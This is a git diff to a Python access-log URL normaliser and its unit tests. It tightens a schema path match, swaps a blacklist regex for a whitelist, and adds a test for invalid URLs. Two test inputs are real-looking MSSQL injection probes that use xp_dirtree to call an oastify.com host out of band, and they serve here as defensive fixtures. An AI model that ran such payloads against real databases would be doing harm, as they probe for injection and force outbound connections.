diff --git a/src/scripts/glue_jobs/process_access_record.py b/src/scripts/glue_jobs/process_access_record.py index 1aefcbc..ebc9f6a 100644 --- a/src/scripts/glue_jobs/process_access_record.py +++ b/src/scripts/glue_jobs/process_access_record.py @@ -117,13 +117,13 @@ def get_normalized_method_signature(requesturl): result = "/user/bundle" elif "/access/" in requesturl: result = "/objects/#/access/#" - elif "/schema/type/" in requesturl: - result = "/schema/type/#" + elif "/schema/type/registered/" in requesturl: + result = "/schema/type/registered/#" else: # find and remove substring in url starting from ';' until '/' if present. result = re.sub(r';[^/]+', '', requesturl) - # find and remove special characters in url - result = re.sub(r'[\'!@$%^&*()_+{}\[\]:;<>,.?~\\|=]+', '', result) + # find and remove any character that is not a word character (letters, digits, or underscores) or slash. + result = re.sub(r'[^\w\/]', '', result) # find and replace substrings with length >=2 in url containing ids with '#'. ID can start with 'syn', # 'fh' or digits. result = re.sub(r'\b(syn|fh)\d+(\.\d+)?\b|\b\d+(\w+)?[^/]\b', '#', result) diff --git a/tests/test_process_access_record.py b/tests/test_process_access_record.py index b5bccd2..38309d8 100644 --- a/tests/test_process_access_record.py +++ b/tests/test_process_access_record.py @@ -147,7 +147,7 @@ def test_normalized_signature_for_drs_object_for_fileHandleId(self): self.assertEqual(expected_output, real_output) def test_normalized_signature_for_schema_type(self): - expected_output = "/schema/type/#" + expected_output = "/schema/type/registered/#" real_output = process_access_record.get_normalized_method_signature( "/repo/v1/schema/type/registered/a245ac37480fc40739836ce61801d19f1-my.schema-0.36652.1") self.assertEqual(expected_output, real_output) @@ -215,14 +215,16 @@ def test_normalized_signature_for_bundle(self): "/repo/v1/user/bundle;declare%20@q%20varchar(99);set%20@q='%5C%5Cb2eg7v959m35phq0mzthfsysajgf491a0yroff72xqm.oasti'+'fy.com%5Cfmt';%20exec%20master.dbo.xp_dirtree%20@q;--%20") self.assertEqual(expected_output, real_output) - def test_normalized_signature_for_twoFA(self): + def test_normalized_signature_for_two_fa(self): expected_output = "/2fa/enroll" real_output = process_access_record.get_normalized_method_signature("/auth/v1/2fa/enroll") self.assertEqual(expected_output, real_output) - def test_normalized_signature_for_twoFA(self): - expected_output = "/2fa/enroll" - real_output = process_access_record.get_normalized_method_signature("/auth/v1/2fa/enroll") + def test_normalized_signature_for_invalid_url(self): + expected_output = "INVALID URL" + real_output = process_access_record.get_normalized_method_signature("/repo/v1;declare%20@q%20varchar(99);" + "set%20@q='%5C%5Caq4fvux4xlr4dgezayhg3rmryi4es8p9oxfn3kqbe0.oasti'+' %5Cicr';%20exec%20master.dbo.xp_dirtree" + "%20@q;--%20/user/bundle") self.assertEqual(expected_output, real_output) def test_get_client_for_web(self):